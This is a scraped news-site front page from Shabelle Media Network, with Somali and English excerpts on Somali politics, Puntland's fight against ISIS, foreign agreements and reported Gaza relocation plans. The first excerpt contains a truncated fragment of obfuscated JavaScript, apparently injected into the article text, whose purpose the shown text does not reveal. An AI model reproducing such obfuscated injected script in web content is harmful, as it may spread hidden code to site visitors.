Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Itoobiya Iyo Maamulka KGS oo isku raacay qodob ay horay DFS uga diiday Maamulkasi

BAYDHABO - Madaxweyne Lafta-Gareen ayaa Baydhabo kula kulmay Saraakiil sare oo katirsan Militeriga Itoobiya, oo ay kawada hadleen dagaalka ka dhan ah Al-Shabaab.   Lafta-Gareen ayaa u sheegay Saraakiisha inay Ciidanka Itoobiya kaliya ka howlgali doonaan deegaanada Koonfur Galbeed, xili dowladda Soomaaliya rabto inay ku bedesho Askarta Masar, oo dhawaan dalka imaanaya. DAAWO WARBIXINTA function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...

Hantidhowrayaasha Soomaaliya iyo Masar oo ku heshiiyay inay yeeshaan Iskaashi

QAAHIRA - Hantidhowraha Guud ee Jamhuuriyadda Federaalka Soomaaliya, Axmed Ciise Guutaale, iyo dhiggiisa Madaxweynaha Hay'adda Dhexe ee Hantidhowrista Masar, Mudane Maxamed Al-Faisal Yusuf, ayaa maanta yeeshay kulan muhiim ah oo lagu xoojinayo iskaashiga labada hay'adood ee ay kala hoggaamiyaan.   Kulankan ayaa diiradda lagu saaray sidii loo heli lahaa wada-shaqayn joogto ah, iyadoo la xoojinayo xirfadaha, aqoonta, iyo awooda shaqaalaha...

Madaxweynaha Soomaaliya oo Gaaray Magaalada Kampala ee Caasimada Uganda

KAMPALA - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa maanta gaaray magaalada Kampala ee caasimadda dalka Uganda.   Madaxweyne Xasan Sheekh Maxamuud ayaa magaalada Kampala ku soo dhaweeyey dhigiisa dalka Uganda, Mudane Yoweri Museveni, iyagoo qorsheynaya inay ka wada hadlaan sidii loo xoojin lahaa xiriirka labada dal iyo iskaashiga ku aaddan la dagaalanka argagaxisada,...

Madaxweyne Xasan Sheekh oo ka hadlay dagaalka Puntland kula jirto Daacish

MUQDISHO - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa sii xoojiyay baaqa Golaha Xukuumadda Federaalka Soomaaliya ee ku aaddan howlgalka ka dhanka ah argagixisada Daacish ee ku dhuumaaleysanaysa buuraha Calmiskaad ee gobolka Bari.   Madaxweynaha ayaa bogaadiyey guulaha taariikhiga ah ee ay soo hooyeen ciidanka iyo shacabka Dowlad Goboleedka Puntland. Madaxweynaha ayaa faray Xukuumadda in ay dardargeliso hirgelinta go’aanka...

Puntland President Visits Wounded Soldiers, Offers Support After Anti-ISIS Operation

BOSASO, Puntland - Puntland's President Said Abdullahi Deni on Wednesday visited soldiers injured during a counter-terrorism operation in the Calmiskaad region of Bari, where they were being treated in a local hospital.   During his visit, President Deni showed solidarity with the wounded troops, receiving updates from medical staff and support committees on their conditions. He ordered that the soldiers receive...

Deni oo booqday oo Isbitaalka Boosaaso ku Askar dagaalka Daacish ku dhaawacmay

Boosaaso: Madaxweynaha Dowladda Puntland Mudane Siciid Cabdullaahi Deni, ayaa maanta Isbitaalka ku booqday Ciidamada geesiyaasha ah ee kusoo dhaawacmay hawlgalka Argagixisada looga sifeynayo buuralayda, Calmiskaad ee Gobolka Bari.   Madaxweynaha ayaa garab istaag u muujiyay Ciidamada wuxuuna warbixin ka dhegaystay Masuuliyiinta Caafimaadka iyo guddiga taakulaynta Ciidamada, wuxuuna faray in la dardargeliyo daaweyntooda si dhameystiran dalka iyo Hadii loo baahdoba dibadda. Madaxweynaha ayaa...

Somalia’s cabinet endorses deals deal Azerbaijan on Education, Training, and Energy

MOGADISHU, Somalia — The Council of Ministers of the Federal Government of Somalia approved two significant agreements with Azerbaijan aimed at advancing cooperation in education, training, and energy sectors.   The memorandum of understanding, reached between the governments of Somalia and Azerbaijan, is expected to greatly contribute to the development of these crucial areas, focusing on enhancing educational opportunities, energy resources,...

Maxaa looga hadlay Shirka Gollaha Wasiiradda Soomaaliya?

Muqidisho :- Shirka Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, ayaa lagu ansixiyey laba heshiis oo ay wada gaareen dowladaha Soomaaliya iyo Aserbajaan, kuwaas oo ku saabsan dhinacyada Waxbarashada, Tababarrada iyo Tamarta.   Heshiisyada is-afgarad ee ay wada gaareen Soomaaliya iyo Aserbajaan, ayaa wax weyn ka tari doonaa horumarinta dhinacyada Waxbarashada, Tamarta iyo tayeynta xirfadaha. Shirka Golaha Wasiirrada oo uu guddoomiyey Ra’iisul Wasaare...

Trump oo Falastiiniyiin usoo raraya Marooko iyo Soomaaliya: Warbixin

WASHINGTON - Warbixin ay baahisay TV-ga N12 ayaa lagu sheegay in maamulka Trump uu qorsheynayo in uu Palestiiniyiinta Gaza, usoo raro Marooko iyo Soomaaliya.   Warbixinta ayaa tilmaamaysa in Puntland, iyo Somaliland uu doonayo Trump inay noqdaan meelaha la dejinayo dadka laga soo qixinayo magaaladda Gaza oo Israel ay isha ku hayso inay lawareegto mustaqbalka. Si kastaba ha ahaatee, qorshaha Trump ayaa...

Trump displacement plan eyes Morocco, Puntland, Somaliland: Reports

WASHINGTON - Israeli news outlet N12 reported on Wednesday that the Trump administration is considering displacing Palestinians from Gaza as part of a broader US-led plan to ethnically cleanse the Strip.   The report suggests that Morocco, Puntland, and Somaliland are being discussed as possible destinations for displaced Gazans. The proposal appears to hinge on the strategic interests of these regions, as all...

WARAR KALE

SoDMA Sends Delegation for Flood Response Training in China

MOGADISHU, Somalia -- Somalia’s disaster management agency (SoDMA) and federal member state relief ministers held a farewell ceremony in Mogadishu for 25 officials who...

JSP oo Musharrax u magacaabay doorashada Galmudug

Muqdisho – Xarunta dhexe ee Ururka Caddaaladda iyo Wadajirka (JSP) ayaa lagu qabtay kulan muhiim ah oo Guddiga Fulinta ee ururka, kaas oo uu...

Somalia Sends Disaster Officials to China for Flood Response Training

MOGADISHU, Somalia — Somalia's disaster management agency on Saturday dispatched 25 officials to China for specialized training on flood preparedness and emergency response, as authorities...